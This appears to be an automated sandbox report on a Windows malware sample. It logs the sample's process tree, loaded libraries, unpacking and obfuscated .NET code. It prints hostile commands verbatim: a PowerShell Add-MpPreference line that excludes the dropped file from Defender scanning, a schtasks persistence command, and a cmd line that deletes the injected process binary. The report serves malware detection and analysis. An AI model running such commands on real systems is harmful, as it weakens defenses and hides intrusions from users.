              Source: file.exe ReversingLabs: Detection: 71%
              Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
              Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: unknown Process created: C:\Users\user\AppData\Roaming\aVmZDnwW.exe C:\Users\user\AppData\Roaming\aVmZDnwW.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmpB1B3.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe"
              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp"
              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmpB1B3.tmp"
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: dwrite.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: iconcodecservice.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.510000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
              Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.510000.0.unpack
              Source: 0.2.file.exe.94a0000.5.raw.unpack, MainForm.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
              Source: 0.2.file.exe.4408da8.4.raw.unpack, QIPlbgwOxDNvtcBdQw.cs | .Net Code: sIXRE8bdHi System.Reflection.Assembly.Load(byte[])
              Source: 0.2.file.exe.4243c78.1.raw.unpack, MainForm.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
              Source: 0.2.file.exe.a400000.6.raw.unpack, QIPlbgwOxDNvtcBdQw.cs | .Net Code: sIXRE8bdHi System.Reflection.Assembly.Load(byte[])
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, QIPlbgwOxDNvtcBdQw.cs | .Net Code: sIXRE8bdHi System.Reflection.Assembly.Load(byte[])
              Source: 8.2.aVmZDnwW.exe.2a33ca0.1.raw.unpack, MainForm.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_029A8338 push eax; iretd 0_2_029A8339
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0A0A4FFB push D0456990h; iretd 0_2_0A0A5000
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0A0A208F push 8400005Eh; iretd 0_2_0A0A2099
              Source: file.exe | Static PE information: section name: .text entropy: 7.699766185970356
              Source: aVmZDnwW.exe.0.dr | Static PE information: section name: .text entropy: 7.699766185970356
              Source: 0.2.file.exe.4408da8.4.raw.unpack, QIPlbgwOxDNvtcBdQw.cs | High entropy of concatenated method names: 'FgHjqIT7DP', 'NAdjlbThCd', 'poij3weWBT', 'CA7jFlJe61', 'KbljYSJjil', 'FGGjoiZAYl', 'C2dj6wASdi', 'GvPjwY8xej', 'SQ2jrjWJFI', 'hASjnGUOq7'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, m2S1o1vvEKblSvSGBe.cs | High entropy of concatenated method names: 'UFoFIIEfPx', 'sGtFHaaRSV', 'Kf7F9IHW1C', 'f4HFvvIPFL', 'JSFFC1S71s', 'B8kFZaMGDh', 'beSFgAj268', 'dZvFdY0br2', 't6AFhHgfwu', 'kFyFSZeFJr'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, hCi7ubO39LUTUumiC2.cs | High entropy of concatenated method names: 'aGsoqQeYti', 'D40o3AYSLc', 'XTSoYVssZ7', 'vdQo6vjlZW', 'P2XowNbF2m', 'hw1Y0jNAsg', 'uTqYuw95hS', 'iOaYbUCd5T', 'FD0Y8GZyfc', 'z3kYeriexH'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, F7WtHKJtQWTcou7oqS.cs | High entropy of concatenated method names: 'zlkYKRGMFW', 'vCTYxclDRU', 'zliFGYb0Ca', 'EX5FfKKxBf', 'WYgFBeJGRk', 'i8hFmCRSMA', 'Is7FQ5SmEp', 'GOtFMtvfcM', 'aMBF5ffXFu', 'fEEFTkV3I1'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, K8KxjfXRQcRipaOAt1H.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IbU2h4AAj8', 'JUG2S4pEEl', 'Ssj2tN2LPF', 'jHR22dWReo', 'kdT2yecrfG', 'NBt21hRB90', 'nv32pZ8UyK'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, lMtam3cA0yx1dQi5MF.cs | High entropy of concatenated method names: 'eSQN9VWtZ9', 'Wt8Nvo3riO', 'QyeNORQHUT', 'XyyNAx5Z0r', 'cswNfet3MF', 'Eg4NBQZYbV', 'pQ2NQdHKvm', 'rQGNMmUAgA', 'PaCNT67THm', 'buwNseurBL'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, Cp8HAELrj1ru5cEc6O.cs | High entropy of concatenated method names: 'qSCERfokx', 'M9pI8ug8n', 'a7tHe7eB5', 'HmuxiCk35', 'h2WvlFy3i', 't7cJ0KD2U', 'ykvAxEfyIhf6nM1lO3', 'JumTCBQANw3kyKk8eZ', 'h9ldwIquQ', 'cEbSR3oAa'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, JQTcVuRCfs6Kyxwn2i.cs | High entropy of concatenated method names: 'BXxX6346ht', 'i1xXwxbI8G', 'wvEXnKblSv', 'sGBXaeO7Wt', 'V7oXCqSFCi', 'YubXZ39LUT', 'hjoPJNUI8LgHRUX1Sf', 'PKHpVwl7nZslLrZk2Z', 'BxcXXNK2B6', 'eSkXja6w70'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, QMCIaMbg5s4A5F1Ftw.cs | High entropy of concatenated method names: 'JsMhCZ3ASZ', 'nY3hg7ifVC', 'AJNhhNpMgh', 'espht4jQVf', 'XUJhyLwe6O', 'i3LhpeS0DN', 'Dispose', 'tODdlodraT', 'yZ9d35MWln', 'CHZdFAZsN7'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, unhoQLuGpTXrEEiGIk.cs | High entropy of concatenated method names: 'cXCg8msucl', 'fTHg76MESs', 'OTod4giy9o', 'RYidX639aa', 'yBbgs2WkNi', 'd7WgDMDSgp', 'TGQgc9XmKF', 'zLegPjiUoH', 'ikRgiT9ftb', 'n8egWnj65t'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, HNmOmBX4eBFQGadRm6t.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'roZSsLWKKp', 'gCkSDUi03v', 'uD5ScHsJeH', 'mSiSPpP7iB', 'XnLSi2TXUF', 'XFaSWAplPv', 'MUQSkQAXoI'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, C346ht9Y1xxbI8GhL8.cs | High entropy of concatenated method names: 'bCK3Pbjhoe', 'rZr3iBwu8M', 'aXC3WcHmrl', 'l1v3k8MBo3', 'QiP30FCTAA', 'DAM3uNi0Am', 'wiJ3bm2jeq', 'dol38ifPOB', 'xPn3eyDSjm', 'DpE374u0ca'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, Kp03lmQWNmpMfpEna0.cs | High entropy of concatenated method names: 'WFA6lo3bkq', 'JvO6FELjmU', 'vja6oEt7qD', 'hlZo7EGTdD', 'ViXozDDEtf', 'XlU64mlVl9', 'klW6XQemcW', 'NWt6LApok1', 'lNm6j5YOxs', 'Vcn6RQgJKb'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, HuOdfZXXU5PqKvLGHXp.cs | High entropy of concatenated method names: 'bVHS7sh7Lv', 'GD6SzMu4U3', 'hivt409Ux1', 'or9tXhLiY7', 'N5ftL3gCbL', 'wnftjRqJDM', 'sFgtRxN5Wa', 'BWLtqKpAFE', 'TkEtleIFfp', 'wHjt3xoSWt'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, L8KxqU5Z5chxFVN1Ct.cs | High entropy of concatenated method names: 'nm06VZFlIh', 'aiJ6UIZRED', 'YyS6EdPQoe', 'eks6ITBoJV', 'Tk66KyWuu5', 'Vcc6HqYGk8', 'jSC6xGREjL', 'pRJ69rymKM', 'Pt06v2IuXL', 'iwX6Jts740'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, Urbt7oFB2bKwG3VRLj.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wstLe855n3', 'BZKL7vbiSQ', 'Xw5LzqdBtP', 'zGoj4lvhHZ', 'h5djXXkGqS', 'KKxjLg8HsZ', 'uAIjjOUdWR', 'CPZYrmCimk66nMov6IB'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, QZVcKReRAumOGuY0EA.cs | High entropy of concatenated method names: 'EOchOjH0KR', 'wqHhAbCDgl', 'jYEhGO8eyA', 'Hdqhfn7ckw', 'P4dhBqtvrk', 'QethmQ9lbW', 'mCAhQoTlN6', 'dYNhMmV4Cl', 'CcJh5Y6xaC', 'IIThTUJecZ'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, x7bpfQ7AV1lU9lutB4.cs | High entropy of concatenated method names: 'DOcSFQPQ8u', 'X43SYq0OJj', 'ihrSoj8id0', 'fq8S681Psy', 'MvdShNFQ2i', 'xfWSweC6Py', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, UWDZo0zBYX4HeHS04i.cs | High entropy of concatenated method names: 'YCOSHOAOOh', 'jFAS96f3Tm', 'iBLSvX2CRq', 'pY7SOxsnYk', 'KdhSAfPAXO', 'eOWSfMEXid', 'f7NSBAwYKY', 'qtfSp6WGND', 'FlRSVI9HBl', 'JrGSUwSwVg'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, NQDUis3aDFjfNFfLCL.cs | High entropy of concatenated method names: 'Dispose', 'O4AXe5F1Ft', 'TtQLAWx8Cw', 'gGHrJHMGoe', 'kVyX7L0Kql', 'sF6XzhS3Au', 'ProcessDialogKey', 'g7PL4ZVcKR', 'dAuLXmOGuY', 'UEALLp7bpf'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, grbhcskJK8fq6kUfDJ.cs | High entropy of concatenated method names: 'fPxgnJS4hu', 'UHagasiPUR', 'ToString', 'lPeglU7aff', 'poFg3e5Vd5', 'OdIgFjUxJ9', 'T2DgYewGuF', 'yphgoFgUS2', 'keUg6L52C4', 'bNJgwELrlP'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, LL0pDnWLwxJhYsmNZi.cs | High entropy of concatenated method names: 'ToString', 'EFxZsprHOs', 'WldZAKTEVo', 'qDiZGtoumO', 'XY4ZfO1Rc3', 'JCJZBTFEWq', 'pVFZmjyVxs', 'I82ZQvLIfk', 'qciZMcdbUE', 'fKPZ5TOetE'
              Source: 0.2.file.exe.4408da8.4.raw.unpack, PdOKg2Pfglta4gw7b6.cs | High entropy of concatenated method names: 'vJpCT8iCCu', 'k18CDOa7tb', 'qB1CPTPiOL', 'T9LCiAPxfo', 'rXaCA7nDSp', 'zkqCGMvyJT', 'AYiCfHWQC9', 'y5YCBi2TmD', 'PugCm7BARt', 'jyrCQbxmno'
              Source: 0.2.file.exe.a400000.6.raw.unpack, QIPlbgwOxDNvtcBdQw.cs | High entropy of concatenated method names: 'FgHjqIT7DP', 'NAdjlbThCd', 'poij3weWBT', 'CA7jFlJe61', 'KbljYSJjil', 'FGGjoiZAYl', 'C2dj6wASdi', 'GvPjwY8xej', 'SQ2jrjWJFI', 'hASjnGUOq7'
              Source: 0.2.file.exe.a400000.6.raw.unpack, m2S1o1vvEKblSvSGBe.cs | High entropy of concatenated method names: 'UFoFIIEfPx', 'sGtFHaaRSV', 'Kf7F9IHW1C', 'f4HFvvIPFL', 'JSFFC1S71s', 'B8kFZaMGDh', 'beSFgAj268', 'dZvFdY0br2', 't6AFhHgfwu', 'kFyFSZeFJr'
